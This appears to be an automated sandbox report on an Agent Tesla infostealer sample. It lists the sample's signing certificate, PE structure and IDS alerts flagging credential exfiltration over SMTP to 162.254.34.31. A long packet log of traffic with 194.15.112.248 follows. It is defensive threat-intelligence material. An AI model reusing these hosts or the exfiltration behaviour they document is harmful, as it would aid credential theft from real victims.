                                                                                  • OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
                                                                                  Version:3
                                                                                  Thumbprint MD5:FF0E889D2A73C3A679605952D35452DC
                                                                                  Thumbprint SHA-1:2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
                                                                                  Thumbprint SHA-256:A73352D67693AA16BCE2F182B15891F0F23EA0485CC18938686AAFDEE7B743E3
                                                                                  Serial:6DD2E3173995F51BFAC1D9FB4CB200C1
                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x43da00x4b.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x10e28.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x532000x1de0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x560000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000x41df40x41e00102d06c84424e63954a39ec2819e6137False0.3905175225332068data5.67905571766169IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x440000x10e280x11000f610e0855d271b56b7174997eb33bf0bFalse0.055893841911764705data4.109331107170668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x560000xc0x200f840735ffb5cd866dbd5b914a57abacdFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0x441300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.046492369572932686
                                                                                  RT_GROUP_ICON0x549580x14data1.15
                                                                                  RT_VERSION0x5496c0x308data0.4497422680412371
                                                                                  RT_MANIFEST0x54c740x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385
                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-03T15:16:09.896860+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.849713162.254.34.31587TCP
                                                                                  2024-12-03T15:16:09.896860+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.849713162.254.34.31587TCP
                                                                                  2024-12-03T15:16:46.430602+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.849720162.254.34.31587TCP
                                                                                  2024-12-03T15:16:46.430602+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.849720162.254.34.31587TCP
                                                                                  2024-12-03T15:17:46.883614+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.849713162.254.34.31587TCP
                                                                                  2024-12-03T15:17:46.883614+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.849713162.254.34.31587TCP
                                                                                  2024-12-03T15:18:23.121832+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.849720162.254.34.31587TCP
                                                                                  2024-12-03T15:18:23.121832+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.849720162.254.34.31587TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 3, 2024 15:15:43.531351089 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:43.531405926 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:43.531478882 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:43.554296970 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:43.554317951 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:45.664944887 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:45.665096998 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:45.677556038 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:45.677573919 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:45.677865982 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:45.727628946 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:45.797149897 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:45.839345932 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:46.791019917 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:46.791043043 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:46.791153908 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:46.791167974 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:46.791208029 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:46.805167913 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:46.805315971 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:46.813796043 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:46.813904047 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:46.981210947 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:46.981333971 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:46.991250992 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:46.991365910 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.007551908 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.007760048 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.007774115 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.007828951 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.031472921 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.031569004 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.032334089 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.032413006 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.049231052 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.049397945 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.064976931 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.065128088 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.169059038 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.169189930 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.182106972 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.182239056 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.188623905 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.188709021 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.202356100 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.202440977 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.219587088 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.219655991 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.224694014 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.224759102 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.230001926 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.230070114 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.230165958 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.230215073 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.241869926 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.241952896 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.253377914 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.253453016 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.358675003 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.358756065 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.359162092 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.359220028 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.367614985 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.367716074 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.376384974 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.376507044 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.380471945 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.380549908 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.388685942 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.388760090 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.392333031 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.400049925 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.400127888 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.400135994 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.400185108 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.411659956 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.411746979 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.419599056 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.419650078 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.419704914 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.419714928 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.419724941 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.423646927 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.423724890 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.423732042 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.423779011 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.431618929 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.431696892 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.438985109 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.439074993 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.443064928 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.443173885 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.443180084 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.443231106 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.553761959 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.553894043 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.570135117 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.570143938 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.570175886 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.570311069 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.570322990 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.570375919 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.575881004 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.575979948 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.579134941 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.579230070 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.585073948 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.585202932 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.592720032 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.592859983 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.597645998 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.597776890 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.610255957 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.610347033 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.611695051 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.611777067 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.613199949 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.613260984 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.613655090 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.613709927 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.619369984 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.619436026 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.627283096 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.627357960 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.629858017 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.629935980 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.634556055 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.634617090 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.639344931 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.639410019 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.642908096 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.643009901 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.647032022 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.647109985 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.652466059 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.652564049 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.658077002 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.658152103 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.663923025 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.663983107 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.668481112 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.668562889 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.672660112 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.672744989 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.679105043 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.679173946 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.682199001 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.682271004 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.687802076 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.687890053 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.688390970 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.743254900 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.765717983 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.765888929 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.768383980 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.768491983 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.772466898 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.772556067 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.776818991 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.776916981 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.779567003 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.779645920 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.785712004 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.785804033 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.795995951 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.796082020 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.800334930 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.800434113 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.803976059 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.804056883 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.806143999 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.806212902 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.807616949 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.807672024 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.809051991 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.809114933 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.810538054 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.810590982 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.811261892 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.811331987 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.812758923 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.812829018 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.954488993 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.954585075 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.975275040 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.975374937 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.978795052 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.978877068 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.981777906 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.981851101 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.985404968 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.985461950 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.989783049 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.989896059 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.996349096 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.996437073 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:47.998533964 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:47.998627901 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.000693083 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.000775099 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.002222061 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.002304077 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.003065109 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.003132105 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.004359961 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.004441023 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.005096912 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.005156040 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.006537914 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.006616116 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.007337093 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.007409096 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.007419109 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.007461071 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.207411051 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.207499981 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.209085941 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.209142923 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.211143970 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.211205006 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.212297916 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.212364912 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.214241028 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.214304924 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.216236115 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.216336966 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.217396021 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.217454910 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.219266891 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.219357014 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.221338034 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.221401930 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.222522020 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.222573996 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.223335028 CET44349710194.15.112.248192.168.2.8
                                                                                  Dec 3, 2024 15:15:48.274673939 CET49710443192.168.2.8194.15.112.248
                                                                                  Dec 3, 2024 15:15:48.292891026 CET44349710194.15.112.248192.168.2.8
